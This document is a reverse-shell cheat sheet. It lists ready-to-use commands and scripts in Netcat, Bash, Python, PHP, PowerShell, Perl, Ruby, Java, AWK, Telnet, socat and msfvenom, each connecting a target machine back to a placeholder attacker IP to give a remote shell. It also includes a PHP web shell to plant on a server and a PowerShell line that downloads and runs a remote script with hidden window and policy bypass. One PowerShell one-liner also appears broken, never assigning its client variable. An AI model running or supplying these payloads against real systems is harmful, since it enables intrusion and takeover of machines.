Using Netcat
Netcat Simple Shell: On the attacker's machine:
nc -lvp 4444On the target machine:
nc <attacker_IP> 4444 -e /bin/bashNetcat with mkfifo: On the attacker's machine:
nc -lvp 4444On the target machine:
mkfifo /tmp/f; nc <attacker_IP> 4444 < /tmp/f | /bin/sh > /tmp/f 2>&1; rm /tmp/f
Using Bash
Bash One-Liner: On the attacker's machine:
nc -lvp 4444On the target machine:
bash -i >& /dev/tcp/<attacker_IP>/4444 0>&1Bash with /dev/tcp:
exec 5<>/dev/tcp/<attacker_IP>/4444 cat <&5 | while read line; do $line 2>&5 >&5; done
Using Python
Python 2: On the attacker's machine:
nc -lvp 4444On the target machine:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker_IP>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'Python 3:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker_IP>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Using PHP
PHP One-Liner: On the attacker's machine:
nc -lvp 4444On the target machine (e.g., in a web shell):
php -r '$sock=fsockopen("<attacker_IP>",4444);exec("/bin/sh -i <&3 >&3 2>&3");'PHP Web Shell Script: On the attacker's machine:
nc -lvp 4444On the target machine, place the following PHP script on a web server:
<?php $sock=fsockopen("<attacker_IP>",4444); exec("/bin/sh -i <&3 >&3 2>&3"); ?>
Using PowerShell
PowerShell One-Liner: On the attacker's machine:
nc -lvp 4444
On the target machine:
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("<attacker_IP>",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Using Perl
Perl One-Liner: On the attacker's machine:
nc -lvp 4444
On the target machine:
perl -e 'use Socket;$i="<attacker_IP>";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Using Ruby
Ruby One-Liner: On the attacker's machine:
nc -lvp 4444
On the target machine:
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("<attacker_IP>","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
Using Socat
Socat Simple Reverse Shell: On the attacker's machine:
socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash
On the target machine:
socat TCP:<attacker_IP>:4444 EXEC:/bin/bash
Using Node.js
Node.js One-Liner: On the attacker's machine:
nc -lvp 4444
On the target machine:
require('child_process').exec('nc <attacker_IP> 4444 -e /bin/sh')
Using Java
Java Reverse Shell: On the attacker's machine:
nc -lvp 4444
On the target machine:
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class ReverseShell {
public static void main(String[] args) {
String host = "<attacker_IP>";
int port = 4444;
String cmd = "/bin/bash";
try {
Socket s = new Socket(host, port);
Process p = Runtime.getRuntime().exec(cmd);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
while (pi.available() > 0) so.write(pi.read());
while (pe.available() > 0) so.write(pe.read());
while (si.available() > 0) po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
} catch (Exception e) {}
}
p.destroy();
s.close();
} catch (Exception e) {}
}
}
Using xterm
xterm Reverse Shell: On the attacker's machine:
xterm -display <attacker_IP>:1
On the target machine:
xterm -display <attacker_IP>:1
Using Telnet
Telnet Reverse Shell: On the attacker's machine:
telnet <attacker_IP> 4444
On the target machine:
rm -f /tmp/p; mknod /tmp/p p && telnet <attacker_IP> 4444 0</tmp/p | /bin/sh 1>/tmp/p 2>&1
Using AWK
AWK Reverse Shell: On the attacker's machine:
nc -lvp 4444
On the target machine:
awk 'BEGIN {s = "/inet/tcp/0/<attacker_IP>/4444"; while(1) {printf "> " |& s; if ((s |& getline c) <= 0) break; while ((c |& getline) > 0) print $0 |& s; close(c)}}'
Using PHP Web Shell
PHP Web Shell Script: On the attacker's machine:
nc -lvp 4444
On the target machine, place the following PHP script on a web server:
<?php
$sock=fsockopen("<attacker_IP>",4444);
exec("/bin/sh -i <&3 >&3 2>&3");
?>
Using MSFvenom (Metasploit)
MSFvenom Reverse Shell: Generate a payload:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<attacker_IP> LPORT=4444 -f elf > shell.elf
On the attacker's machine:
msfconsole
use exploit/multi/handler
set payload linux/x86/shell_reverse_tcp
set LHOST <attacker_IP>
set LPORT 4444
exploit
On the target machine, run the generated payload:
chmod +x shell.elf
./shell.elf
Using Powershell with Invoke-PowerShellTcp
Powershell Invoke-PowerShellTcp: On the attacker's machine:
nc -lvp 4444
On the target machine:
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1')
Invoke-PowerShellTcp -Reverse -IPAddress <attacker_IP> -Port 4444